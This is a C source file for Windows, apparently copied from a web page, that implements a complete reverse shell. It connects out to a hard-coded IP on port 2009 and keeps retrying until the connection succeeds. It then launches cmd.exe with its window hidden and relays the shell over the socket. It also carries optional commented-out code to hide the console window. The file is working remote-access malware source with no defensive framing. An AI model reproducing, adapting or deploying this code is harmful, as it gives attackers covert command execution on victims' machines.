/* _____ .__ ___. .__ __ __
/ _ \ | |\_ |__ |__| ____ ____ _____| | ____ __ ____ | | __
/ /_\ \| | | __ \| |/ \ / _ \/ ___/ |/ / | \/ \| |/ /
/ | \ |_| \_\ \ | | ( <_> )___ \| <| | / | \ <
\____|__ /____/___ /__|___| /\____/____ >__|_ \____/|___| /__|_ \
\/ \/ \/ \/ \/ \/ \/
*/
#include <winsock2.h>
#include <stdio.h>
//link ws2_32.lib
#define BUFF_SIZE 1024
#define COMMAND_INTERPRETER "cmd.exe" // change this to "command.com" if used under a DOS enviroment.
char IP [20] = "127.0.0.1";
int sendBuffer(HANDLE hPipe, SOCKET hSock);
int recvBuffer(HANDLE hPipe, SOCKET hSock);
void FreeResources(HANDLE hRead, HANDLE hWrite, PROCESS_INFORMATION *pi)
{
CloseHandle(hRead);
CloseHandle(hWrite);
TerminateProcess(pi->hProcess, 0);
WSACleanup();
}
int main(void)
{
/*hide window functionality, un-comment to use*/
/*HWND stealth;
AllocConsole();
stealth=FindWindowA("ConsoleWindowClass",NULL);
ShowWindow(stealth,0);*/
WSADATA wsaData;
SOCKET hSock;
sockaddr_in sin = {0}, rsin;
int addr_len = sizeof(sockaddr_in);
DWORD dwErr, dwRet;
HANDLE hOutputRd, hOutputWr, hInputRd, hInputWr;
SECURITY_ATTRIBUTES sa = {sizeof(SECURITY_ATTRIBUTES)};
STARTUPINFO si={0};
PROCESS_INFORMATION pi={0};
WSAStartup(0x101, &wsaData);
struct sockaddr_in sock_addr;
int ERR;
hSock = socket(AF_INET, SOCK_STREAM, 0);
sock_addr.sin_port = htons(2009);
sock_addr.sin_family = AF_INET;
sock_addr.sin_addr.s_addr = inet_addr(IP);
do {
ERR = connect(hSock,(struct sockaddr*) &sock_addr, sizeof( sock_addr ));
Sleep(1000);
} while (ERR == SOCKET_ERROR);
sa.lpSecurityDescriptor = NULL;
sa.bInheritHandle = TRUE;
if(!CreatePipe(&hOutputRd, &hOutputWr, &sa, NULL))
{
dwErr = GetLastError();
printf("ERROR: Pipe creation failed! (Code %d)\n", dwErr);
return -1;
}
if(!CreatePipe(&hInputRd, &hInputWr, &sa, NULL))
{
dwErr = GetLastError();
printf("ERROR: Pipe creation failed! (Code %d)\n", dwErr);
return -1;
}
GetStartupInfo(&si);
si.hStdError = hOutputWr;
si.hStdOutput = hOutputWr;
si.hStdInput = hInputRd;
si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;
si.wShowWindow = SW_HIDE;
if(!CreateProcess(NULL, TEXT(COMMAND_INTERPRETER), NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))
{
dwErr = GetLastError();
printf("ERROR: Process creation failed! (Code %d)\n", dwErr);
return -1;
}
CloseHandle(hOutputWr);
CloseHandle(hInputRd);
printf("Connection estabilished with Remote Computer");
for(;;)
{
do
{
dwRet = sendBuffer(hOutputRd, hSock);
if(dwRet == -1)
{
FreeResources(hOutputRd, hInputWr, &pi);
break;
}
} while (dwRet != FALSE);
dwRet = recvBuffer(hInputWr, hSock);
if(dwRet == -1)
{
FreeResources(hOutputRd, hInputWr, &pi);
break;
}
}
printf("Connection closed, exiting...\n");
return 0;
}
int sendBuffer(HANDLE hPipe, SOCKET hSock)
{
TCHAR szBuffer[BUFF_SIZE];
DWORD nBytesAvail;
if(!PeekNamedPipe(hPipe, NULL, BUFF_SIZE, &nBytesAvail, 0, 0) || nBytesAvail == 0)
return FALSE;
if(!ReadFile(hPipe, szBuffer, nBytesAvail, &nBytesAvail, 0))
return -1;
if(send(hSock, szBuffer, nBytesAvail, 0) == SOCKET_ERROR)
return FALSE;
Sleep(50);
return TRUE;
}
int recvBuffer(HANDLE hPipe, SOCKET hSock)
{
TCHAR szBuffer[BUFF_SIZE];
DWORD nBytesAvail, nBytesWritten;
nBytesAvail = recv(hSock, szBuffer, BUFF_SIZE, 0);
printf (szBuffer);
if(nBytesAvail == SOCKET_ERROR)
return FALSE;
if(nBytesAvail == 0)
return -1;
if(!WriteFile(hPipe, szBuffer, nBytesAvail, &nBytesWritten, NULL))
return FALSE;
Sleep(50);
return TRUE;
}
评论0